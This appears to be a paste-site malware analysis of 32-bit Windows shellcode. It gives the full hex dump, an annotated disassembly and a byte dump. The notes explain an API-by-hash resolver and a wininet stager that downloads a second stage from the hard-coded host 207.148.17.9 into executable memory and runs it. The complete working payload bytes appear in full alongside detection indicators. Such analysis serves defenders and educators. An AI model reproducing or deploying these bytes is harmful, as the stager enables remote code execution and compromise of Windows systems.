James_inthe_box

Decoded

Mar 7th, 2018
  1. Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 6a 50 e8 b0 00 00 00 2f 79 6d 42 4e 43 54 46 51 36 43 67 38 4c 54 30 73 5a 72 4c 66 4f 77 55 2d 6b 65 32 42 53 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 32 30 37 2e 31 34 38 2e 31 37 2e 39 00
  ; Analyst notes (added on review, defender/educator stance). 32-bit Windows x86
  ; position-independent shellcode. Layout as visible in this listing:
  ;   0x00-0x05  entry: cld, then `call 0x88` whose pushed return address (0x06) is
  ;              popped into ebp at 0x88, so every later `call ebp` invokes the
  ;              routine at 0x06 with [hash] as its first stack argument.
  ;   0x06-0x87  API-by-hash resolver: walks the loaded-module list, hashes each
  ;              module name and export name (ROR-13, uppercased), and tail-jumps
  ;              into the matching export so the caller's stack args are passed through.
  ;   0x88-0x165 stager body: LoadLibraryA("wininet"), InternetOpenA, InternetConnectA
  ;              (see note at 0xb6), HttpOpenRequestA, InternetSetOptionA,
  ;              HttpSendRequestA with a 10 x 5 s retry loop, ExitProcess on failure,
  ;              VirtualAlloc(RWX), InternetReadFile loop, `ret` into the downloaded bytes.
  ;   0x166-0x16b trampoline yielding a pointer to the URI string; 0x16c onward is the
  ;              host string "207.148.17.9" (byte dump), not instructions.
  ; Detection/IoC summary (all values from this page): HTTP GET to 207.148.17.9 port 80,
  ; URI /ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS, then a second stage written into a freshly
  ; allocated PAGE_EXECUTE_READWRITE region and executed. The listing between 0xb6 and
  ; 0xe7 is mis-disassembled string data (see comment there) - do not treat those
  ; mnemonics as behaviour.
  1. 0x00000000 fc cld
  2. 0x00000001 e882000000 call 0x00000088  ; pushes 0x06 = address of the resolver below
  ; ---- API resolver (entered via `call ebp`); caller pushed the 32-bit hash before the call
  3. 0x00000006 60 pushad  ; save all regs; [esp+0x1c] is the saved eax slot, patched with the result later
  4. 0x00000007 89e5 mov ebp,esp  ; ebp = frame base: [ebp+0x20] return addr, [ebp+0x24] requested hash
  5. 0x00000009 31c0 xor eax,eax
  6. 0x0000000b 648b5030 fs: mov edx,dword [eax + 48]  ; TEB+0x30 -> PEB (standard 32-bit layout)
  7. 0x0000000f 8b520c mov edx,dword [edx + 12]  ; PEB+0x0c -> PEB_LDR_DATA
  8. 0x00000012 8b5214 mov edx,dword [edx + 20]  ; +0x14 -> InMemoryOrderModuleList (first entry)
  ; .next_module: edx = current LDR entry (InMemoryOrder link)
  9. 0x00000015 8b7228 mov esi,dword [edx + 40]  ; esi = BaseDllName.Buffer (UTF-16)
  10. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]  ; ecx = BaseDllName.MaximumLength (byte count, drives `loop`)
  11. 0x0000001c 31ff xor edi,edi  ; edi = running module-name hash
  12. 0x0000001e ac lodsb  ; al = next name byte (eax upper bytes stay zero)
  13. 0x0000001f 3c61 cmp al,97  ; 97 = 'a'
  14. 0x00000021 7c02 jl 0x00000025  ; signed compare: bytes >= 0x80 are left as-is
  15. 0x00000023 2c20 sub al,32  ; lowercase -> uppercase, so the hash is case-insensitive
  16. 0x00000025 c1cf0d ror edi,13
  17. 0x00000028 01c7 add edi,eax  ; hash = ror(hash,13) + byte
  18. 0x0000002a e2f2 loop 0x0000001e
  19. 0x0000002c 52 push edx  ; [ebp-4] = module entry (needed to advance the list later)
  20. 0x0000002d 57 push edi  ; [ebp-8] = module-name hash
  21. 0x0000002e 8b5210 mov edx,dword [edx + 16]  ; edx = DllBase
  22. 0x00000031 8b4a3c mov ecx,dword [edx + 60]  ; e_lfanew (PE header offset)
  23. 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]  ; export directory RVA (DataDirectory[0])
  24. 0x00000038 e348 jecxz 0x00000082  ; no export table -> skip this module
  25. 0x0000003a 01d1 add ecx,edx  ; ecx = export directory VA
  26. 0x0000003c 51 push ecx  ; keep it; popped as eax at 0x61
  27. 0x0000003d 8b5920 mov ebx,dword [ecx + 32]  ; AddressOfNames RVA
  28. 0x00000040 01d3 add ebx,edx
  29. 0x00000042 8b4918 mov ecx,dword [ecx + 24]  ; ecx = NumberOfNames (loop counter)
  ; .next_export: iterate names from last to first
  30. 0x00000045 e33a jecxz 0x00000081  ; names exhausted -> next module
  31. 0x00000047 49 dec ecx
  32. 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
  33. 0x0000004b 01d6 add esi,edx  ; esi = export name string
  34. 0x0000004d 31ff xor edi,edi  ; edi = running export-name hash
  35. 0x0000004f ac lodsb
  36. 0x00000050 c1cf0d ror edi,13
  37. 0x00000053 01c7 add edi,eax
  38. 0x00000055 38e0 cmp al,ah  ; ah is 0 here: stop at the NUL terminator
  39. 0x00000057 75f6 jnz 0x0000004f
  40. 0x00000059 037df8 add edi,dword [ebp - 8]  ; combined = module hash + export hash
  41. 0x0000005c 3b7d24 cmp edi,dword [ebp + 36]  ; compare with the hash the caller pushed
  42. 0x0000005f 75e4 jnz 0x00000045
  ; match found
  43. 0x00000061 58 pop eax  ; eax = export directory VA
  44. 0x00000062 8b5824 mov ebx,dword [eax + 36]  ; AddressOfNameOrdinals
  45. 0x00000065 01d3 add ebx,edx
  46. 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]  ; ordinal for this name index
  47. 0x0000006b 8b581c mov ebx,dword [eax + 28]  ; AddressOfFunctions
  48. 0x0000006e 01d3 add ebx,edx
  49. 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
  50. 0x00000073 01d0 add eax,edx  ; eax = resolved function VA
  51. 0x00000075 89442424 mov dword [esp + 36],eax  ; overwrite the pushad-saved eax so popad returns it
  52. 0x00000079 5b pop ebx  ; discard module hash
  53. 0x0000007a 5b pop ebx  ; discard module entry
  54. 0x0000007b 61 popad  ; eax = function VA, other regs restored
  55. 0x0000007c 59 pop ecx  ; ecx = caller's return address
  56. 0x0000007d 5a pop edx  ; drop the hash argument
  57. 0x0000007e 51 push ecx  ; re-push return address...
  58. 0x0000007f ffe0 jmp eax  ; ...so the API returns straight to the caller with its own stack args
  ; no match in this module: unwind and follow the list
  59. 0x00000081 5f pop edi  ; discard export directory VA (reached from 0x45 only)
  60. 0x00000082 5f pop edi  ; discard module hash
  61. 0x00000083 5a pop edx  ; edx = module entry
  62. 0x00000084 8b12 mov edx,dword [edx]  ; Flink -> next module (list is circular; never terminates on a miss)
  63. 0x00000086 eb8d jmp 0x00000015
  ; ---- stager body
  64. 0x00000088 5d pop ebp  ; ebp = 0x06 (resolver); all `call ebp` below go through it
  65. 0x00000089 686e657400 push 0x0074656e--> 'ten'  ; builds "wininet\0" on the stack
  66. 0x0000008e 6877696e69 push 0x696e6977--> 'iniw'
  67. 0x00000093 54 push esp  ; arg: lpLibFileName -> "wininet"
  68. 0x00000094 684c772607 push 0x0726774c--> '&wL'  ; API hash
  69. 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  70. 0x0000009b 31db xor ebx,ebx  ; ebx = 0, reused as a NULL/0 argument throughout
  71. 0x0000009d 53 push ebx
  72. 0x0000009e 53 push ebx
  73. 0x0000009f 53 push ebx
  74. 0x000000a0 53 push ebx
  75. 0x000000a1 53 push ebx  ; all five InternetOpenA arguments are 0/NULL
  76. 0x000000a2 683a5679a7 push 0xa779563a--> 'yV:'
  77. 0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA  ; eax = hInternet
  78. 0x000000a9 53 push ebx  ; dwContext = 0
  79. 0x000000aa 53 push ebx  ; dwFlags = 0
  80. 0x000000ab 6a03 push 3  ; dwService = 3 (INTERNET_SERVICE_HTTP)
  81. 0x000000ad 53 push ebx  ; lpszPassword = NULL
  82. 0x000000ae 53 push ebx  ; lpszUserName = NULL
  83. 0x000000af 6a50 push 80  ; nServerPort = 80
  84. 0x000000b1 e8b0000000 call 0x00000166  ; pushes 0xb6 = address of the URI string, then see 0x166
  ; NOTE(review): 0xb6-0xe7 below is the NUL-terminated string
  ; "/ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS" (hex dump / byte dump) followed by code the
  ; disassembler decoded out of alignment. Actual code resumes at 0xd5 - from the hex
  ; dump: `push eax` (hInternet), `push 0xc69f8957`, `call ebp` (argument pattern is
  ; consistent with InternetConnectA; this call is missing from the page's annotations),
  ; `mov esi,eax`, `push ebx`, `push 0x84e03200` (request flags), then `push ebx` x3,
  ; `push edi` (URI), `push ebx`, `push esi` (hConnect) - the HttpOpenRequestA arguments
  ; that the listing picks up again at 0xe7. The mnemonics on the next lines are noise.
  85. 0x000000b6 2f das
  86. 0x000000b7 796d jns 0x00000126
  87. 0x000000b9 42 inc edx
  88. 0x000000ba 4e dec esi
  89. 0x000000bb 43 inc ebx
  90. 0x000000bc 54 push esp
  91. 0x000000bd 46 inc esi
  92. 0x000000be 51 push ecx
  93. 0x000000bf 3643 ss: inc ebx
  94. 0x000000c1 67384c5430 cmp byte [esp + edx * 2 + 48],cl
  95. 0x000000c6 735a jnc 0x00000122
  96. 0x000000c8 724c jc 0x00000116
  97. 0x000000ca 664f dec edi
  98. 0x000000cc 7755 ja 0x00000123
  99. 0x000000ce 2d6b653242 sub eax,0x4232656b
  100. 0x000000d3 53 push ebx
  101. 0x000000d4 005068 add byte [eax + 104],dl  ; 0xd4 is the string's NUL; real code starts at 0xd5
  102. 0x000000d7 57 push edi
  103. 0x000000d8 899fc6ffd589 mov dword [edi - 1982464058],ebx
  104. 0x000000de c6536800 mov byte [ebx + 104],0
  105. 0x000000e2 32e0 xor ah,al
  106. 0x000000e4 845353 test byte [ebx + 83],dl
  ; listing is back in sync from here
  107. 0x000000e7 53 push ebx  ; dwContext = 0
  108. 0x000000e8 57 push edi  ; lpszObjectName = URI string
  109. 0x000000e9 53 push ebx  ; lpszVerb = NULL (defaults to GET)
  110. 0x000000ea 56 push esi  ; hConnect
  111. 0x000000eb 68eb552e3b push 0x3b2e55eb--> ';.U'
  112. 0x000000f0 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
  113. 0x000000f2 96 xchg eax,esi  ; esi = hRequest
  114. 0x000000f3 6a0a push 10
  115. 0x000000f5 5f pop edi  ; edi = 10 = remaining send attempts
  ; .retry:
  116. 0x000000f6 6880330000 push 0x00003380  ; SECURITY_FLAG_IGNORE_* bit set (template value; no effect on plain HTTP)
  117. 0x000000fb 89e0 mov eax,esp  ; eax -> the flags dword just pushed
  118. 0x000000fd 6a04 push 4  ; dwBufferLength
  119. 0x000000ff 50 push eax  ; lpBuffer
  120. 0x00000100 6a1f push 31  ; dwOption = 31 (INTERNET_OPTION_SECURITY_FLAGS)
  121. 0x00000102 56 push esi  ; hRequest
  122. 0x00000103 6875469e86 push 0x869e4675--> 'Fu'
  123. 0x00000108 ffd5 call ebp --> wininet.dll!InternetSetOptionA
  124. 0x0000010a 53 push ebx
  125. 0x0000010b 53 push ebx
  126. 0x0000010c 53 push ebx
  127. 0x0000010d 53 push ebx  ; headers/optional data all NULL/0
  128. 0x0000010e 56 push esi
  129. 0x0000010f 682d06187b push 0x7b18062d--> '{-'
  130. 0x00000114 ffd5 call ebp --> wininet.dll!HttpSendRequestA
  131. 0x00000116 85c0 test eax,eax
  132. 0x00000118 7516 jnz 0x00000130  ; success -> download stage
  133. 0x0000011a 6888130000 push 0x00001388  ; 0x1388 = 5000 ms
  134. 0x0000011f 6844f035e0 push 0xe035f044--> '5D'
  135. 0x00000124 ffd5 call ebp --> kernel32.dll!Sleep
  136. 0x00000126 4f dec edi
  137. 0x00000127 75cd jnz 0x000000f6  ; up to 10 attempts, ~50 s total before giving up
  138. 0x00000129 68f0b5a256 push 0x56a2b5f0
  139. 0x0000012e ffd5 call ebp --> kernel32.dll!ExitProcess  ; also reached from 0x15a on a read failure
  ; ---- download second stage into executable memory
  140. 0x00000130 6a40 push 64  ; flProtect = 0x40 (PAGE_EXECUTE_READWRITE) - key detection point
  141. 0x00000132 6800100000 push 4096  ; flAllocationType = 0x1000 (MEM_COMMIT)
  142. 0x00000137 6800004000 push 0x00400000  ; dwSize = 4 MiB
  143. 0x0000013c 53 push ebx  ; lpAddress = NULL
  144. 0x0000013d 6858a453e5 push 0xe553a458--> 'SX'
  145. 0x00000142 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  146. 0x00000144 93 xchg eax,ebx  ; ebx = write cursor (buffer base)
  147. 0x00000145 53 push ebx  ; saved buffer base: consumed by the final `ret` at 0x165
  148. 0x00000146 53 push ebx  ; dwBytesRead slot (initial value irrelevant)
  149. 0x00000147 89e7 mov edi,esp  ; edi -> dwBytesRead
  ; .read_loop:
  150. 0x00000149 57 push edi  ; lpdwNumberOfBytesRead
  151. 0x0000014a 6800200000 push 0x00002000  ; dwNumberOfBytesToRead = 8 KiB
  152. 0x0000014f 53 push ebx  ; lpBuffer = current cursor
  153. 0x00000150 56 push esi  ; hRequest
  154. 0x00000151 68129689e2 push 0xe2899612
  155. 0x00000156 ffd5 call ebp --> wininet.dll!InternetReadFile
  156. 0x00000158 85c0 test eax,eax
  157. 0x0000015a 74cd jz 0x00000129  ; read failed -> ExitProcess
  158. 0x0000015c 8b07 mov eax,dword [edi]  ; bytes read this iteration
  159. 0x0000015e 01c3 add ebx,eax  ; advance cursor (no bound against the 4 MiB allocation)
  160. 0x00000160 85c0 test eax,eax
  161. 0x00000162 75e5 jnz 0x00000149  ; 0 bytes = end of body
  162. 0x00000164 58 pop eax  ; discard dwBytesRead slot
  163. 0x00000165 c3 ret  ; "returns" to the saved buffer base: executes the downloaded stage
  ; ---- URI trampoline: `call 0x166` from 0xb1 left the string address on the stack
  164. 0x00000166 5f pop edi  ; edi -> "/ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS"
  165. 0x00000167 e869ffffff call 0x000000d5  ; pushes 0x16c (the host string below) as lpszServerName; resumes at 0xd5
  ; 0x16c onward is the string "207.148.17.9\0" (byte dump), not instructions
  166. 0x0000016c 3230 xor dh,byte [eax]
  167. 0x0000016e 37 aaa
  168. 0x0000016f 2e313438 cs: xor dword [eax + edi],esi
  169. 0x00000173 2e3137 cs: xor dword [edi],esi
  170. 0x00000176 2e3900 cs: cmp dword [eax],eax
  172.  
  173. Byte Dump:
  174. ......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSjP...../ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...207.148.17.9.